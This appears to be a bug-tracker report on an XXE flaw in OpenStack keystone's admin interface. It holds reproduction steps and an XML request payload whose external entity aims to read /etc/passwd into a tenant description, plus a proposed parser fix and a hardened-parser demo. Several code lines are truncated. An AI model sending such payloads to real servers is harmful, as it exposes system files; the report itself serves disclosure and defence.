XXE vulnerability in keystone
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Identity (keystone) | New | Undecided | Unassigned | |
Bug Description
It's possible to gain access to arbitrary files on a keystone server by injecting XXE into the admin interface of a keystone server.
You need a valid admin token to achieve this.
1. Authenticate to the Keystone service to gain a valid administrative token.
2. Submit the request below to the admin keystone endpoint.
3. Verify a tenant is created and the "description" field contains the contents of the /etc/passwd file on the keystone server.
```http
POST https:/ HTTP/1.1
Host: admin-auth-
Content-length: 253
Proxy-Connection: Keep-Alive
Accept: */*
X-Auth-Token: <VALID AUTH TOKEN>
User-Agent: python-
Content-Type: application/xml
Accept: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:/
<tenant xmlns="http://
enabled="true" id="XxeTest2" name="Xxe Tenant 2">
<description>
</tenant>
```
Possible solution:

keystone/

```python
class XmlDeserializer
    def __call__(self, xml_str):
        """Returns a dictionary populated by decoding the given xml string."""
        dom = etree.fromstrin
        return self.walk_
```

Replace:

```python
        dom = etree.fromstrin
```

With:

```python
        dom = etree.fromstrin
            parser=
```
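The following is an added example (not keystone's own code) showing why the proposed `parser=` change matters: it parses a constructed request body modelled on the one in the report, once with lxml's default parser and once with entity resolution disabled. It assumes the lxml package; the `load_dtd`/`no_network` settings and the `unresolved_entities` helper are additional hardening and detection ideas not spelled out in the report.

```python
# Added example, not keystone's code. Contrasts lxml's default parser,
# which expands DTD-declared entities, with a parser configured as the
# report suggests (resolve_entities=False). Requires the lxml package.
from lxml import etree

# Hardened parser: resolve_entities=False is the report's suggestion;
# load_dtd=False and no_network=True are extra hardening (assumption).
SAFE_PARSER = etree.XMLParser(resolve_entities=False, load_dtd=False,
                              no_network=True)


def build_tenant_request(entity_decl: bytes) -> bytes:
    """Constructed request body: an entity declared in the DOCTYPE and
    referenced from <description>, as in the report (namespace omitted)."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<!DOCTYPE root [ ' + entity_decl + b' ]>\n'
            b'<tenant enabled="true" id="XxeTest2" name="Xxe Tenant 2">'
            b'<description>&foo;</description></tenant>')


def tenant_description(xml_bytes: bytes, hardened: bool = True) -> str:
    """Deserialize the tenant document and return its description text.

    hardened=False mimics a bare etree.fromstring() call, so the entity
    is expanded into the description. hardened=True passes SAFE_PARSER,
    so the reference stays unexpanded and no external content is read.
    """
    parser = SAFE_PARSER if hardened else etree.XMLParser()
    dom = etree.fromstring(xml_bytes, parser=parser)
    desc = dom.find("description")
    return (desc.text or "") if desc is not None else ""


def unresolved_entities(xml_bytes: bytes) -> list:
    """Names of entity references the hardened parser left unexpanded.

    A non-empty list on an API request is a cheap signal worth logging:
    legitimate keystone clients have no reason to declare entities.
    """
    dom = etree.fromstring(xml_bytes, parser=SAFE_PARSER)
    return [node.name for node in dom.iter(etree.Entity)]


if __name__ == "__main__":
    # Internal entity only, so the demo touches no files on disk.
    doc = build_tenant_request(b'<!ENTITY foo "constructed-secret">')
    print("default parser :", repr(tenant_description(doc, hardened=False)))
    print("hardened parser:", repr(tenant_description(doc, hardened=True)))
    print("unresolved     :", unresolved_entities(doc))
```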
Duplicate bug that is marked fixed released, making un-private.